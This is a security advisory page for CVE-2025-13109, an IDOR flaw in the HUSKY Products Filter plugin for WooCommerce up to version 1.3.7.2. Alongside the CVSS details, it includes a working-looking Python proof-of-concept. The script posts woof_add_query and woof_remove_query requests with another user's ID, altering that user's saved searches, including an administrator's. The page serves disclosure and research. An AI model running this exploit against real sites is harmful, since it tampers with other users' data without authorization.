Security Vulnerability Report
CVE-2025-13109 CVSS 4.3 MEDIUM

CVE-2025-13109

Published: 2025-12-03 13:16:02
Last Modified: 2026-04-15 00:35:42

Description

The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.7.2 via the "woof_add_query" and "woof_remove_query" functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber level access and above, to insert or remove arbitrary saved search queries into any user's profile, including administrators.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)


HUSKY – Products Filter Professional for WooCommerce <= 1.3.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-13109 PoC - IDOR in HUSKY Products Filter Plugin
# Target: WordPress with HUSKY plugin <= 1.3.7.2

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_COOKIE = "wordpress_logged_in_cookie_here"
TARGET_USER_ID = 1  # Target user ID (1 is usually admin)


def add_malicious_query():
    """Insert arbitrary saved search query into target user's profile"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    headers = {
        "Cookie": ATTACKER_COOKIE,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Malicious payload - IDOR via user controlled key
    data = {
        "action": "woof_add_query",
        "user_id": TARGET_USER_ID,  # IDOR: No validation that attacker owns this user_id
        "woof_query_key": "malicious_query",
        "woof_query_data": "{\"price\":{\"min\":0,\"max\":0},\"stock_status\":\"instock\"}",
    }
    try:
        response = requests.post(endpoint, headers=headers, data=data, timeout=10)
        print(f"[*] Request sent to {endpoint}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        if response.status_code == 200:
            print("[+] Malicious query may have been added successfully")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def remove_user_query():
    """Remove saved search query from target user's profile"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    headers = {
        "Cookie": ATTACKER_COOKIE,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    data = {
        "action": "woof_remove_query",
        "user_id": TARGET_USER_ID,  # IDOR vulnerability
        "woof_query_key": "legitimate_query",
    }
    try:
        response = requests.post(endpoint, headers=headers, data=data, timeout=10)
        print("[*] Remove query request sent")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-13109 PoC - HUSKY Plugin IDOR Vulnerability")
    print("=" * 60)
    print("\n[*] Exploiting IDOR in woof_add_query/woof_remove_query")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Target User ID: {TARGET_USER_ID}\n")
    print("[1] Attempting to add malicious query...")
    add_malicious_query()
    print("\n[2] Attempting to remove legitimate query...")
    remove_user_query()
    print("\n[*] PoC execution completed")
```

References

WordPress.org plugin changeset: https://plugins.trac.wordpress.org/changeset/3400527
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/9effc186-c225-4b3b-9b8c-c453505a41de?source=cve
